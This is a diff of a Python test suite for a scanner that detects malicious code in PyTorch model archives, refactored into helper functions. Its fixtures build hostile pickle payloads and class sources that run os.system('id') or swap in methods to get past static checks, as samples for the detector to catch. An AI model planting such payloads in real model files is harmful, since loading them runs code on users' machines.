config: dict[str, object] | None = None) -> ScanResult: - nested_scan_calls.append(path) - nested_result = ScanResult(scanner_name="zip") - nested_result.finish(success=True) - return nested_result - result = PyTorchZipScanner( config={ "max_zip_depth": 1, "_archive_depth": 1, - NESTED_SCAN_CALLBACK_CONFIG_KEY: scan_nested_member, + NESTED_SCAN_CALLBACK_CONFIG_KEY: partial(_record_nested_zip_scan, nested_scan_calls), } ).scan(str(zip_path)) @@ -15862,13 +13837,9 @@ def test_get_installed_pytorch_version_returns_none_when_metadata_unavailable_wi ) -> None: scanner = PyTorchZipScanner() - def unavailable_distributions(*args: object, **kwargs: object) -> Iterator[object]: - del args, kwargs - raise RuntimeError("metadata unavailable") - monkeypatch.delitem(sys.modules, "torch", raising=False) monkeypatch.setattr(scanner, "_trusted_python_package_roots", lambda: (tmp_path / "site-packages",)) - monkeypatch.setattr(importlib_metadata, "distributions", unavailable_distributions) + monkeypatch.setattr(importlib_metadata, "distributions", _unavailable_distributions) import_calls = _forbid_torch_import(monkeypatch) assert scanner._get_installed_pytorch_version() is None @@ -15957,14 +13928,10 @@ def test_get_installed_pytorch_version_falls_back_to_trusted_already_imported_to fake_torch.__version__ = "2.4.1+cpu" fake_torch.__file__ = str(torch_package / "__init__.py") - def fail_metadata_lookup(*args: object, **kwargs: object) -> Iterator[object]: - del args, kwargs - raise RuntimeError("metadata unavailable") - monkeypatch.setitem(sys.modules, "torch", fake_torch) monkeypatch.setattr(scanner, "_trusted_python_package_roots", lambda: (trusted_root,)) monkeypatch.setattr(scanner, "_resolve_torch_import_origin", lambda: torch_package / "__init__.py") - monkeypatch.setattr(importlib_metadata, "distributions", fail_metadata_lookup) + monkeypatch.setattr(importlib_metadata, "distributions", _unavailable_distributions) import_calls = _forbid_torch_import(monkeypatch) assert scanner._get_installed_pytorch_version() == "2.4.1+cpu" @@ -16391,16 +14358,6 @@ def _pickle_global_bytes(module: bytes, name: bytes) -> bytes: return b"c" + module + b"\n" + name + b"\n" -def _pickle_binunicode_bytes(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - -def _pickle_short_binunicode_bytes(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - def _static_getattr_reduce_payload( *, attribute: bytes = b"forward", @@ -16474,16 +14431,6 @@ def _static_getattr_with_memo_read_args_tuple_payload() -> bytes: return b"\x80\x04" + _pickle_global_bytes(b"__builtin__", b"getattr") + args_tuple + b"q\x000h\x00R." -def _static_getattr_protocol0_unicode_payload() -> bytes: - return b"c__builtin__\ngetattr\ncultralytics.nn.modules.head\nDetect\nVforward\n\x86R." - - -def _clear_ultralytics_modules() -> None: - for module_name in tuple(sys.modules): - if module_name == "ultralytics" or module_name.startswith("ultralytics."): - sys.modules.pop(module_name, None) - - def _write_ultralytics_head_source( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, @@ -16694,32 +14641,18 @@ def test_pytorch_zip_static_getattr_source_backed_method_sink_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( - tmp_path, - monkeypatch, - "import os\n\nclass Detect:\n def forward(self):\n os.system('id')\n", + _assert_static_getattr_source_s115( + tmp_path, monkeypatch, ("import os\n\nclass Detect:\n def forward(self):\n os.system('id')\n") ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_decorated_method_descriptor_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( - tmp_path, - monkeypatch, - "class Detect:\n @property\n def forward(self):\n return None\n", + _assert_static_getattr_source_s115( + tmp_path, monkeypatch, ("class Detect:\n @property\n def forward(self):\n return None\n") ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_module_initialization_side_effect_keeps_s115( @@ -16727,16 +14660,11 @@ def test_pytorch_zip_static_getattr_module_initialization_side_effect_keeps_s115 monkeypatch: pytest.MonkeyPatch, ) -> None: marker = tmp_path / "import-side-effect.txt" - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, f"open({str(marker)!r}, 'w').write('loaded')\n\nclass Detect:\n def forward(self):\n return None\n", ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_executable_class_body_keeps_s115( @@ -16744,277 +14672,228 @@ def test_pytorch_zip_static_getattr_executable_class_body_keeps_s115( monkeypatch: pytest.MonkeyPatch, ) -> None: marker = tmp_path / "class-body-side-effect.txt" - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "class Detect:\n" - f" open({str(marker)!r}, 'w').write('loaded')\n\n" - " def forward(self):\n" - " return None\n", + f"class Detect:\n open({str(marker)!r}, 'w').write('loaded')\n\n" + " def forward(self):\n return None\n", ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_class_namespace_write_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "def evil(self):\n" - " return None\n\n" - "class Detect:\n" - " def forward(self):\n" - " return None\n" - " locals()['forward'] = evil\n", - ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) + ( + "def evil(self):\n" + " return None\n\n" + "class Detect:\n" + " def forward(self):\n" + " return None\n" + " locals()['forward'] = evil\n" + ), + ) def test_pytorch_zip_static_getattr_decorated_class_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "import os\n\n" - "def replace(_cls):\n" - " class Replacement:\n" - " def forward(self):\n" - " os.system('id')\n" - " return Replacement\n\n" - "@replace\n" - "class Detect:\n" - " def forward(self):\n" - " return None\n", + ( + "import os\n\n" + "def replace(_cls):\n" + " class Replacement:\n" + " def forward(self):\n" + " os.system('id')\n" + " return Replacement\n\n" + "@replace\n" + "class Detect:\n" + " def forward(self):\n" + " return None\n" + ), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_post_class_method_rewrite_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "class Detect:\n" - " def forward(self):\n" - " return None\n\n" - "def evil(self):\n" - " return None\n\n" - "Detect.forward = evil\n", + ( + "class Detect:\n" + " def forward(self):\n" + " return None\n\n" + "def evil(self):\n" + " return None\n\n" + "Detect.forward = evil\n" + ), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_control_flow_post_class_rewrite_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "class Detect:\n" - " def forward(self):\n" - " return None\n\n" - "def evil(self):\n" - " return None\n\n" - "if True:\n" - " Detect.forward = evil\n", + ( + "class Detect:\n" + " def forward(self):\n" + " return None\n\n" + "def evil(self):\n" + " return None\n\n" + "if True:\n" + " Detect.forward = evil\n" + ), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_post_class_binding_target_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "class Evil:\n" - " def forward(self):\n" - " return None\n\n" - "class Detect:\n" - " def forward(self):\n" - " return None\n\n" - "for Detect in [Evil]:\n" - " pass\n", + ( + "class Evil:\n" + " def forward(self):\n" + " return None\n\n" + "class Detect:\n" + " def forward(self):\n" + " return None\n\n" + "for Detect in [Evil]:\n" + " pass\n" + ), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_class_body_import_rebinding_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "class Detect:\n def forward(self):\n return None\n from os import system as forward\n", + ("class Detect:\n def forward(self):\n return None\n from os import system as forward\n"), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_post_class_helper_call_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "class Detect:\n" - " def forward(self):\n" - " return None\n\n" - "def evil(self):\n" - " return None\n\n" - "def patch(cls):\n" - " cls.forward = evil\n\n" - "patch(Detect)\n", + ( + "class Detect:\n" + " def forward(self):\n" + " return None\n\n" + "def evil(self):\n" + " return None\n\n" + "def patch(cls):\n" + " cls.forward = evil\n\n" + "patch(Detect)\n" + ), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_conditional_class_body_method_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "import os\n\n" - "class Base:\n" - " def forward(self):\n" - " os.system('id')\n\n" - "class Detect(Base):\n" - " if False:\n" - " def forward(self):\n" - " return None\n", + ( + "import os\n\n" + "class Base:\n" + " def forward(self):\n" + " os.system('id')\n\n" + "class Detect(Base):\n" + " if False:\n" + " def forward(self):\n" + " return None\n" + ), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_dynamic_metaclass_keyword_lookup_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "import os\n\n" - "class DetectMeta(type):\n" - " def __getattribute__(cls, name):\n" - " os.system('id')\n" - " return super().__getattribute__(name)\n\n" - "class Detect(**{'metaclass': DetectMeta}):\n" - " def forward(self):\n" - " return None\n", + ( + "import os\n\n" + "class DetectMeta(type):\n" + " def __getattribute__(cls, name):\n" + " os.system('id')\n" + " return super().__getattribute__(name)\n\n" + "class Detect(**{'metaclass': DetectMeta}):\n" + " def forward(self):\n" + " return None\n" + ), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_dynamic_base_lookup_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "def make_base():\n" - " class Base:\n" - " pass\n" - " return Base\n\n" - "class Detect(make_base()):\n" - " def forward(self):\n" - " return None\n", + ( + "def make_base():\n" + " class Base:\n" + " pass\n" + " return Base\n\n" + "class Detect(make_base()):\n" + " def forward(self):\n" + " return None\n" + ), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_unresolved_base_lookup_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( - tmp_path, - monkeypatch, - "class Detect(ExternalBase):\n def forward(self):\n return None\n", + _assert_static_getattr_source_s115( + tmp_path, monkeypatch, ("class Detect(ExternalBase):\n def forward(self):\n return None\n") ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_static_getattr_inherited_metaclass_lookup_keeps_s115( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_s115( tmp_path, monkeypatch, - "class DetectMeta(type):\n" - " def __getattribute__(cls, name):\n" - " return super().__getattribute__(name)\n\n" - "class Base(metaclass=DetectMeta):\n" - " pass\n\n" - "class Detect(Base):\n" - " def forward(self):\n" - " return None\n", + ( + "class DetectMeta(type):\n" + " def __getattribute__(cls, name):\n" + " return super().__getattribute__(name)\n\n" + "class Base(metaclass=DetectMeta):\n" + " pass\n\n" + "class Detect(Base):\n" + " def forward(self):\n" + " return None\n" + ), ) - model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert _critical_s115_getattr_issues(result) def test_pytorch_zip_repository_inventory_marks_safetensors_available_without_local_file(tmp_path: Path) -> None: @@ -18269,20 +16148,7 @@ def test_pytorch_zip_cve_2022_45907_version_check( monkeypatch: pytest.MonkeyPatch, ) -> None: """A vulnerable local runtime should trigger CVE-2022-45907.""" - model_path = _create_pytorch_zip_with_framework_version(tmp_path / "model.pt", "2.10.0") - scanner = PyTorchZipScanner() - monkeypatch.setattr(scanner, "_get_installed_pytorch_version", lambda: "1.13.0") - result = scanner.scan(str(model_path)) - - cve_checks = [c for c in result.checks if "CVE-2022-45907" in c.name] - failed_checks = [c for c in cve_checks if c.status == CheckStatus.FAILED] - assert len(failed_checks) > 0, ( - f"Should flag PyTorch 1.13.0 as vulnerable to CVE-2022-45907. " - f"Checks: {[(c.name, c.status) for c in result.checks]}" - ) - assert failed_checks[0].details.get("detected_pytorch_version") == "1.13.0" - assert failed_checks[0].details.get("pytorch_version_source") == "local_environment" - _assert_standard_cve_details(failed_checks[0].details, "CVE-2022-45907", "1.13.0") + _assert_runtime_cve_version(tmp_path, monkeypatch, "1.13.0", "CVE-2022-45907") def test_pytorch_zip_cve_2022_45907_fixed_version( @@ -18290,15 +16156,7 @@ def test_pytorch_zip_cve_2022_45907_fixed_version( monkeypatch: pytest.MonkeyPatch, ) -> None: """Fixed producer metadata should not trigger CVE-2022-45907.""" - model_path = _create_pytorch_zip_with_framework_version(tmp_path / "model.pt", "1.13.1") - scanner = PyTorchZipScanner() - monkeypatch.setattr(scanner, "_get_installed_pytorch_version", lambda: None) - result = scanner.scan(str(model_path)) - - cve_failed = [c for c in result.checks if "CVE-2022-45907" in c.name and c.status == CheckStatus.FAILED] - assert len(cve_failed) == 0, ( - f"PyTorch 1.13.1 should NOT trigger CVE-2022-45907. Failed checks: {[(c.name, c.message) for c in cve_failed]}" - ) + _assert_fixed_cve_metadata(tmp_path, monkeypatch, "1.13.1", "CVE-2022-45907") # --- CVE-2024-5480 version check tests --- @@ -18309,20 +16167,7 @@ def test_pytorch_zip_cve_2024_5480_version_check( monkeypatch: pytest.MonkeyPatch, ) -> None: """A vulnerable local runtime should trigger CVE-2024-5480.""" - model_path = _create_pytorch_zip_with_framework_version(tmp_path / "model.pt", "2.10.0") - scanner = PyTorchZipScanner() - monkeypatch.setattr(scanner, "_get_installed_pytorch_version", lambda: "2.2.2") - result = scanner.scan(str(model_path)) - - cve_checks = [c for c in result.checks if "CVE-2024-5480" in c.name] - failed_checks = [c for c in cve_checks if c.status == CheckStatus.FAILED] - assert len(failed_checks) > 0, ( - f"Should flag PyTorch 2.2.2 as vulnerable to CVE-2024-5480. " - f"Checks: {[(c.name, c.status) for c in result.checks]}" - ) - assert failed_checks[0].details.get("detected_pytorch_version") == "2.2.2" - assert failed_checks[0].details.get("pytorch_version_source") == "local_environment" - _assert_standard_cve_details(failed_checks[0].details, "CVE-2024-5480", "2.2.2") + _assert_runtime_cve_version(tmp_path, monkeypatch, "2.2.2", "CVE-2024-5480") def test_pytorch_zip_cve_2024_5480_fixed_version( @@ -18330,15 +16175,7 @@ def test_pytorch_zip_cve_2024_5480_fixed_version( monkeypatch: pytest.MonkeyPatch, ) -> None: """Fixed producer metadata should not trigger CVE-2024-5480.""" - model_path = _create_pytorch_zip_with_framework_version(tmp_path / "model.pt", "2.2.3") - scanner = PyTorchZipScanner() - monkeypatch.setattr(scanner, "_get_installed_pytorch_version", lambda: None) - result = scanner.scan(str(model_path)) - - cve_failed = [c for c in result.checks if "CVE-2024-5480" in c.name and c.status == CheckStatus.FAILED] - assert len(cve_failed) == 0, ( - f"PyTorch 2.2.3 should NOT trigger CVE-2024-5480. Failed checks: {[(c.name, c.message) for c in cve_failed]}" - ) + _assert_fixed_cve_metadata(tmp_path, monkeypatch, "2.2.3", "CVE-2024-5480") # --- CVE-2024-48063 version check tests --- @@ -18349,20 +16186,7 @@ def test_pytorch_zip_cve_2024_48063_version_check( monkeypatch: pytest.MonkeyPatch, ) -> None: """A vulnerable local runtime should trigger CVE-2024-48063.""" - model_path = _create_pytorch_zip_with_framework_version(tmp_path / "model.pt", "2.10.0") - scanner = PyTorchZipScanner() - monkeypatch.setattr(scanner, "_get_installed_pytorch_version", lambda: "2.4.1") - result = scanner.scan(str(model_path)) - - cve_checks = [c for c in result.checks if "CVE-2024-48063" in c.name] - failed_checks = [c for c in cve_checks if c.status == CheckStatus.FAILED] - assert len(failed_checks) > 0, ( - f"Should flag PyTorch 2.4.1 as vulnerable to CVE-2024-48063. " - f"Checks: {[(c.name, c.status) for c in result.checks]}" - ) - assert failed_checks[0].details.get("detected_pytorch_version") == "2.4.1" - assert failed_checks[0].details.get("pytorch_version_source") == "local_environment" - _assert_standard_cve_details(failed_checks[0].details, "CVE-2024-48063", "2.4.1") + _assert_runtime_cve_version(tmp_path, monkeypatch, "2.4.1", "CVE-2024-48063") def test_pytorch_zip_cve_2024_48063_fixed_version( @@ -18370,15 +16194,7 @@ def test_pytorch_zip_cve_2024_48063_fixed_version( monkeypatch: pytest.MonkeyPatch, ) -> None: """Fixed producer metadata should not trigger CVE-2024-48063.""" - model_path = _create_pytorch_zip_with_framework_version(tmp_path / "model.pt", "2.5.0") - scanner = PyTorchZipScanner() - monkeypatch.setattr(scanner, "_get_installed_pytorch_version", lambda: None) - result = scanner.scan(str(model_path)) - - cve_failed = [c for c in result.checks if "CVE-2024-48063" in c.name and c.status == CheckStatus.FAILED] - assert len(cve_failed) == 0, ( - f"PyTorch 2.5.0 should NOT trigger CVE-2024-48063. Failed checks: {[(c.name, c.message) for c in cve_failed]}" - ) + _assert_fixed_cve_metadata(tmp_path, monkeypatch, "2.5.0", "CVE-2024-48063") def test_version_suffix_handling_for_cve_checks() -> None: @@ -18410,3 +16226,435 @@ def test_version_suffix_handling_for_cve_checks() -> None: # Unknown suffix semantics -> conservative vulnerable assert scanner._is_vulnerable_pytorch_version_for("2.2.3foobar", 2, 2, 3) is True + + +def _nested_zip_fixture(tmp_path: Path) -> tuple[Path, Path]: + nested_zip = tmp_path / "nested.zip" + with zipfile.ZipFile(nested_zip, "w") as archive: + archive.writestr("payload.pkl", _malicious_eval_pickle_payload()) + + zip_path = tmp_path / "nested_payload.pt" + with zipfile.ZipFile(zip_path, "w") as zipf: + zipf.writestr("version", "3") + zipf.writestr("data.pkl", pickle.dumps({"weights": [1, 2, 3]}, protocol=4)) + zipf.write(nested_zip, "archive/nested.zip") + return nested_zip, zip_path + + +def _assert_pytorch_late_typed_rule(tmp_path: Path, prefix: bytes, late_state: bytes, rule_code: str) -> None: + zip_path = tmp_path / "model.pt" + padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) + payload = b"\x00\xff" + prefix + padding + late_state + padding + with zipfile.ZipFile(zip_path, "w") as zipf: + zipf.writestr("archive/version", "3") + zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) + zipf.writestr("archive/data/payload.bin", payload) + + result = PyTorchZipScanner().scan(str(zip_path)) + + assert any( + check.name == "JIT/Script Code Execution Detection" + and check.status == CheckStatus.FAILED + and check.location == f"{zip_path}:archive/data/payload.bin" + and check.rule_code == rule_code + for check in result.checks + ) + + +def _record_nested_zip_scan(calls: list[str], /, path: str, config: dict[str, object] | None = None) -> ScanResult: + calls.append(path) + nested_result = ScanResult(scanner_name="zip") + nested_result.finish(success=True) + return nested_result + + +def _assert_referenced_storage_critical(model_path: Path, storage_blob: bytes) -> None: + storage_blob += b" " * (-len(storage_blob) % 4) + with zipfile.ZipFile(model_path, "w") as zip_file: + zip_file.writestr("archive/version", "3\n") + zip_file.writestr("archive/byteorder", "little") + zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + zip_file.writestr("archive/data/0", storage_blob) + + result = PyTorchZipScanner().scan(str(model_path)) + + assert "archive/data/0" in result.metadata["pickle_files"] + assert any( + issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" + for issue in result.issues + ) + + +def _assert_static_getattr_source_s115(tmp_path: Path, monkeypatch: pytest.MonkeyPatch, source_text: str) -> None: + _write_ultralytics_head_source( + tmp_path, + monkeypatch, + source_text, + ) + model_path = _write_getattr_reconstruction_zip(tmp_path, _static_getattr_reduce_payload()) + + result = PyTorchZipScanner().scan(str(model_path)) + + assert _critical_s115_getattr_issues(result) + + +def _assert_rebound_framework_subprocess( + tmp_path: Path, + model_path: Path, + marker: Path, + site_packages: Path, + script: str, + import_reference: str, +) -> None: + completed = subprocess.run( + [sys.executable, "-c", script, str(model_path), str(marker)], + check=False, + env=_preimport_rebound_subprocess_env(tmp_path, site_packages), + capture_output=True, + text=True, + ) + + assert completed.returncode == 0, completed.stderr + output = json.loads(completed.stdout) + assert output["marker_before_unpickle"] is False + assert output["marker_after_unpickle"] is True + assert output["pickle_verdict"] in {"suspicious", "malicious"} + assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) + assert any( + issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" and issue["import_reference"] == import_reference + for issue in output["issues"] + ) + + +def _assert_non_ascii_storage_key(tmp_path: Path, storage_key: str, filename: str, member_name: str) -> None: + payload = _pytorch_storage_persistent_id_payload(storage_key) + model_path = create_mock_pytorch_zip(tmp_path / filename, with_pickle=False) + with zipfile.ZipFile(model_path, "a") as zipf: + zipf.writestr("version", "3") + zipf.writestr("data.pkl", payload) + zipf.writestr(member_name, b"\x00" * 8) + + result = PyTorchZipScanner().scan(str(model_path)) + + assert any(issue.details.get("pickle_rule_code") == "PERSISTENT_ID" for issue in result.issues) + assert not any(check.details.get("trusted_pytorch_archive_context") is True for check in result.checks) + + +def _assert_truncated_encoded_extension(tmp_path: Path, filename: str, payload: bytes) -> None: + model_path = tmp_path / filename + storage_blob = payload + storage_blob += b" " * (-len(storage_blob) % 4) + with zipfile.ZipFile(model_path, "w") as zip_file: + zip_file.writestr("archive/version", "3\n") + zip_file.writestr("archive/byteorder", "little") + zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + zip_file.writestr("archive/data/0", storage_blob) + + result = PyTorchZipScanner().scan(str(model_path)) + + assert result.success is False + assert "archive/data/0" in result.metadata["pickle_files"] + + +def _assert_malformed_separator_noise(tmp_path: Path, filename: str, repetitions: int) -> None: + model_path = tmp_path / filename + storage_blob = b"N." + (b"c" * repetitions) + storage_blob += b" " * (-len(storage_blob) % 4) + with zipfile.ZipFile(model_path, "w") as zip_file: + zip_file.writestr("archive/version", "3\n") + zip_file.writestr("archive/byteorder", "little") + zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + zip_file.writestr("archive/data/0", storage_blob) + + result = PyTorchZipScanner().scan(str(model_path)) + + assert result.success is True + assert result.metadata.get("pickle_verdict") == "clean" + assert result.metadata["pickle_files"] == ["archive/data.pkl"] + assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) + + +def _assert_binary_literal_near_match(tmp_path: Path, filename: str, payload: bytes) -> None: + model_path = tmp_path / filename + storage_blob = payload + storage_blob += b" " * (-len(storage_blob) % 4) + with zipfile.ZipFile(model_path, "w") as zip_file: + zip_file.writestr("archive/version", "3\n") + zip_file.writestr("archive/byteorder", "little") + zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + zip_file.writestr("archive/data/0", storage_blob) + + result = PyTorchZipScanner().scan(str(model_path)) + + assert not any( + issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" + for issue in result.issues + ) + + +def _assert_extensionless_pickle_selected( + tmp_path: Path, filename: str, member_name: str, expected_member: str, finding_member: str +) -> None: + model_path = tmp_path / filename + with zipfile.ZipFile(model_path, "w") as zip_file: + zip_file.writestr("archive/version", "3\n") + zip_file.writestr("archive/byteorder", "little") + zip_file.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]}, protocol=4)) + zip_file.writestr(member_name, _malicious_proto0_system_payload()) + + result = PyTorchZipScanner().scan(str(model_path)) + + assert result.metadata["pickle_files"] == ["archive/data.pkl", expected_member] + assert any( + issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == finding_member + for issue in result.issues + ) + + +def _assert_headerless_byte_near_match(tmp_path: Path, filename: str, payload: bytes, padding: bytes) -> None: + model_path = tmp_path / filename + storage_blob = payload + storage_blob += padding * (-len(storage_blob) % 4) + with zipfile.ZipFile(model_path, "w") as zip_file: + zip_file.writestr("archive/version", "3\n") + zip_file.writestr("archive/byteorder", "little") + zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + zip_file.writestr("archive/data/0", storage_blob) + + result = PyTorchZipScanner().scan(str(model_path)) + + assert result.success is True + assert result.metadata.get("pickle_verdict") == "clean" + assert result.metadata["pickle_files"] == ["archive/data.pkl"] + assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) + assert not any(check.details.get("pickle_filename") == "archive/data/0" for check in result.checks) + + +def _assert_conservative_process_source(tmp_path: Path, payload: bytes, pattern: str) -> None: + zip_path = tmp_path / "model.pt" + with zipfile.ZipFile(zip_path, "w") as zipf: + zipf.writestr("archive/version", "3") + zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) + zipf.writestr("archive/data/payload.bin", payload) + + result = PyTorchZipScanner().scan(str(zip_path)) + + jit_failures = [ + check + for check in result.checks + if check.name == "JIT/Script Code Execution Detection" and check.status == CheckStatus.FAILED + ] + assert any( + check.location == f"{zip_path}:archive/data/payload.bin" and pattern in check.message for check in jit_failures + ) + + +def _assert_headerless_opcode_near_match(tmp_path: Path, storage_blob: bytes, filename: str) -> None: + model_path = tmp_path / filename + storage_blob += b"\x00" * (-len(storage_blob) % 4) + with zipfile.ZipFile(model_path, "w") as zip_file: + zip_file.writestr("archive/version", "3\n") + zip_file.writestr("archive/byteorder", "little") + zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + zip_file.writestr("archive/data/0", storage_blob) + + result = PyTorchZipScanner().scan(str(model_path)) + + assert result.success is True + assert result.metadata.get("pickle_verdict") == "clean" + assert result.metadata["pickle_files"] == ["archive/data.pkl"] + assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) + assert not any(check.details.get("pickle_filename") == "archive/data/0" for check in result.checks) + + +def _assert_forwarded_native_load(tmp_path: Path, prefix: bytes, suffix: bytes) -> None: + zip_path = tmp_path / "model.pt" + padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) + payload = prefix + padding + suffix + padding + with zipfile.ZipFile(zip_path, "w") as zipf: + zipf.writestr("archive/version", "3") + zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) + zipf.writestr("archive/data/payload.bin", payload) + + result = PyTorchZipScanner().scan(str(zip_path)) + + assert any( + check.name == "JIT/Script Code Execution Detection" + and check.status == CheckStatus.FAILED + and check.location == f"{zip_path}:archive/data/payload.bin" + and check.rule_code == "S110" + for check in result.checks + ) + + +def _assert_storage_padding_clean(tmp_path: Path, filename: str, padding: bytes, padding_size: int) -> None: + model_path = tmp_path / filename + storage_blob = b"N." + (padding * padding_size) + with zipfile.ZipFile(model_path, "w") as zip_file: + zip_file.writestr("archive/version", "3\n") + zip_file.writestr("archive/byteorder", "little") + zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + zip_file.writestr("archive/data/0", storage_blob) + + result = 